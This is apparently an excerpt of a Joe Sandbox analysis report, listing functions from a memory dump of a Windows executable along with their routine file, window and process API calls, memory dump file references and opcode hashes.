GetFileAttributesW.KERNELBASE(?,?,?,?,00007FF741EAE5B1,?,?,?,00000000,?), ref: 00007FF741EA32E7
GetFileAttributesW.KERNELBASE ref: 00007FF741EA3334
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA3399

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1203560049-0
Opcode ID: d981565e32c06465bb9ca9e6032df0ff87469bcd01ee0110978b6e45bf249536
Instruction ID: 3fd03dc58140ec6b6563f5c902fc150d13a0d49ad5c72c5ea48804afa8d9e85c
Opcode Fuzzy Hash: d981565e32c06465bb9ca9e6032df0ff87469bcd01ee0110978b6e45bf249536
Instruction Fuzzy Hash: AD21A136A1C792C2EB11BB29E444129A361FB89BE5F940231EAAD43BE5DFBCD445C710

Function 00007FF741ECBF64 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF741ECBF48), ref: 00007FF741ECBF8C
TerminateProcess.KERNEL32(?,?,?,00007FF741ECBF48), ref: 00007FF741ECBF97
ExitProcess.KERNEL32 ref: 00007FF741ECBFA6

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
Instruction ID: a1846f382e9379b2eb820050eea5e4f00f9be406f456b2b4a91ee7214c051621
Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
Instruction Fuzzy Hash: 78E01A2CE0C367C6EB557B319C95779A3527F88783F545438C81E02396DEBEA44A8620

Function 00007FF741EBAB54 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32 ref: 00007FF741EBAB8D

Strings

unknown_folder, xrefs: 00007FF741EBAB9A

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: FolderPath
String ID: unknown_folder
API String ID: 1514166925-3920786785
Opcode ID: 41d51420171d2f749ce5f5a35542408828053397ebee158888822d07ea4c3c87
Instruction ID: b84d452a738b3db902a6c9afd7389438f872ff21d7b141bc5c40444b1f4021d7
Opcode Fuzzy Hash: 41d51420171d2f749ce5f5a35542408828053397ebee158888822d07ea4c3c87
Instruction Fuzzy Hash: 3B017C36718A9181EB21BB21B85579AB3A4FBC8B81F894135EE9D43B05DF3CD5018B00

Function 00007FF741E9F578 Relevance: 3.2, APIs: 2, Instructions: 193COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9F895
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9F89B

Part of subcall function 00007FF741EA3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF741EB0811), ref: 00007FF741EA3EFD

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseFind
String ID:
API String ID: 3587649625-0
Opcode ID: 31de71ccb13629eb4e8ff473cf0e989b9a8a473b909947ada8621b483159802c
Instruction ID: c503c1fa23d7140e46cc8ec188f4ac2cbf76225f0a379da995fd7466286e3532
Opcode Fuzzy Hash: 31de71ccb13629eb4e8ff473cf0e989b9a8a473b909947ada8621b483159802c
Instruction Fuzzy Hash: 7591C076A2C7A2D0EB11FB24D8401ADA761FB85799FD04131EA5C07AE9DFB8D581C350

Function 00007FF741E93904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E93AB3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E93AB9

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 402f2d810e1efc6a759daaa5297bed4678b331cbcfb426b8061d29b6a9ebee63
Instruction ID: 2432d4dfbaf6346630a72996cfb7b4d1d766df1ee88cca19262d00fcfb316ed0
Opcode Fuzzy Hash: 402f2d810e1efc6a759daaa5297bed4678b331cbcfb426b8061d29b6a9ebee63
Instruction Fuzzy Hash: 7B41A326F2C662C4FB01FB71D5402FD6321BF45B95F945235DE1D27A9ADEBC94818310

Function 00007FF741EA2778 Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF741EA274D), ref: 00007FF741EA28A9
GetLastError.KERNEL32(?,00007FF741EA274D), ref: 00007FF741EA28B8

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
Instruction ID: 3ac67473aa1b7381d82725bb95d0c06b9add902428bd6d2f475f2ebb71a5f827
Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
Instruction Fuzzy Hash: 2F31C42AB1DA63C2EB627B2AD940674E351BF04BD6F840131FE1D27795DEBCD4428760

Function 00007FF741E922BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF741E922F1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E923F0

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Item_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1746051919-0
Opcode ID: 8763c555b957396376e96df864685bb2527d49eefc22d4d720e740779d29c564
Instruction ID: 5c53528556b6c308a90d6efbb15912b32646eeb0a4eab0ad44776e9b808129d3
Opcode Fuzzy Hash: 8763c555b957396376e96df864685bb2527d49eefc22d4d720e740779d29c564
Instruction Fuzzy Hash: EA31B226A2C757C1EB12FB15E4443AAB360FB85B91F844231EA9C07B96EFBCE040C714

Function 00007FF741EA2AD0 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32 ref: 00007FF741EA2AFE
SetFileTime.KERNELBASE ref: 00007FF741EA2B9B

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
Instruction ID: 4a23594d49dbcb1a8b7c93c838f166b71ea563b8a41f4db8e3929c126463daec
Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
Instruction Fuzzy Hash: A921AB2AB0DB63D6EB63BE11D4007BA9790BB017D6F954031DE4E16292EEBCD486C220

Function 00007FF741EAAAE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF741EAAB67
LoadStringW.USER32 ref: 00007FF741EAAB80

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
Instruction ID: 57b7c8d5747453f95959519390f62041c3926a6d6dc858fa6e76711b0259a101
Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
Instruction Fuzzy Hash: 8A113A79B0CB61D5EB02BB16A840169FBA1BB88FC1BD44935CE0D93720EEBCE5518754

Function 00007FF741EA2BB0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF741EA2C11
GetLastError.KERNEL32 ref: 00007FF741EA2C1E

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
Instruction ID: fc647479852b559958cb786ea740ec92a39b04f277178437dba434a35da23a09
Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
Instruction Fuzzy Hash: 5811D225B1C662C1FB25BB21E840279A360FB40BB5F984331DA3D222D5CFBCD582C310

Function 00007FF741E9255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741EAA4AC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF741EAA504
Part of subcall function 00007FF741EAA4AC: SetDlgItemTextW.USER32 ref: 00007FF741EAA573
Part of subcall function 00007FF741EAA4AC: GetWindowRect.USER32 ref: 00007FF741EAA5AD
Part of subcall function 00007FF741EAA4AC: GetClientRect.USER32 ref: 00007FF741EAA5BB

GetDlgItem.USER32 ref: 00007FF741E925AC
SetWindowTextW.USER32 ref: 00007FF741E925C8

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ItemRectTextWindow$Clientswprintf
String ID:
API String ID: 3322643685-0
Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
Instruction ID: 6b960dc0f26a0531dc12aa2fb6666d423fc9d03ca86791a9ad6f99aa91ef73b9
Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
Instruction Fuzzy Hash: 8C015228A1D36BC2FF5B7751A454279D3517F86B46FC80034DC4E0629AEEACE484C321

Function 00007FF741EAEB58 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,00007FF741EAEBAD,?,?,?,?,00007FF741EA5752,?,?,?,00007FF741EA56DE), ref: 00007FF741EAEB5C
GetProcessAffinityMask.KERNEL32 ref: 00007FF741EAEB6F

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
Instruction ID: 48bb6c33bd5b1ab8b34bceb73434c0e6ebcdc3981dc69a45f27835341e385845
Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
Instruction Fuzzy Hash: 26E0E569B1854682DF1ABB55C4449A9A392BF88B40FC48035D60B83614DE2CE5498B10

Function 00007FF741EC21D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741EC2200

Part of subcall function 00007FF741EC2F7C: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF741EC2F85

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741EC2206

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
String ID:
API String ID: 1173176844-0
Opcode ID: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
Instruction ID: 64b19ecb46feb75e367fcb9cfeb0d283c322f482854ad6031fdc36e68eb107a7
Opcode Fuzzy Hash: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
Instruction Fuzzy Hash: E3E0EC4CE1D12BC1FF2B32651C251B482906FA9772ED81730DA7E092C3BFACA591C130

Function 00007FF741ECD90C Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL ref: 00007FF741ECD922
GetLastError.KERNEL32 ref: 00007FF741ECD934

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
Instruction ID: e47b21ee04fd55ffac9aa77bf1852a3a15a76c5536f5179aeae2638d3af1822a
Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
Instruction Fuzzy Hash: 14E04F58E4D153C2FF0B7BB25C051B492917F94756B880034C90D86252EFADD482D260

Function 00007FF741E933E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9388C

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: db0f75601c8d953953658c1d14be6529ec917dbd1ad2d5887d518296e9f1c024
Instruction ID: 67220a873d5f1f7734c02e4f364a43f94450463a426cf03463d3c34e8baff031
Opcode Fuzzy Hash: db0f75601c8d953953658c1d14be6529ec917dbd1ad2d5887d518296e9f1c024
Instruction Fuzzy Hash: 3ED1996AB1C692D5EB2ABB35D6442BDF7A1FB06B85F840035CA1D077B5CF78E4618320

Function 00007FF741EA5294 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA551B

Part of subcall function 00007FF741EB13F4: CompareStringW.KERNEL32 ref: 00007FF741EB145A

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: CompareString_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1017591355-0
Opcode ID: fa91c3799828e3c7186940546e344b2356dc381c1e63a9425ea543ecc2eeea66
Instruction ID: d69032b70fa85797ca9e9e16e4796bf6b5b1d9ba29e3636ba3e362df1a052e20
Opcode Fuzzy Hash: fa91c3799828e3c7186940546e344b2356dc381c1e63a9425ea543ecc2eeea66
Instruction Fuzzy Hash: D9610459F0C667C1FB66BA25581427ED291BF81BD3FD44131EE4E06AC9EEECE4448230

Function 00007FF741EB1870 Relevance: 1.7, APIs: 1, Instructions: 172COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741EAE948: ReleaseSemaphore.KERNEL32 ref: 00007FF741EAE974
Part of subcall function 00007FF741EAE948: CloseHandle.KERNELBASE ref: 00007FF741EAE993
Part of subcall function 00007FF741EAE948: DeleteCriticalSection.KERNEL32 ref: 00007FF741EAE9AA
Part of subcall function 00007FF741EAE948: CloseHandle.KERNEL32 ref: 00007FF741EAE9B7

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB1ACB

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: CloseHandle$CriticalDeleteReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 904680172-0
Opcode ID: f81b05313dfd5b5a73717daa6d384c08c9459244a7d30a6ec5ae517113eafb45
Instruction ID: 1977c68514e4347180cb9debe1733e37ca3d10546d523e8495f959036eb9e6e5
Opcode Fuzzy Hash: f81b05313dfd5b5a73717daa6d384c08c9459244a7d30a6ec5ae517113eafb45
Instruction Fuzzy Hash: 7661F066B196A6D1EF09FB65E5440BCB365FB40FD1B944232D72D07AC6DFA9E460C300

Function 00007FF741E9EC9C Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9EEB8

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
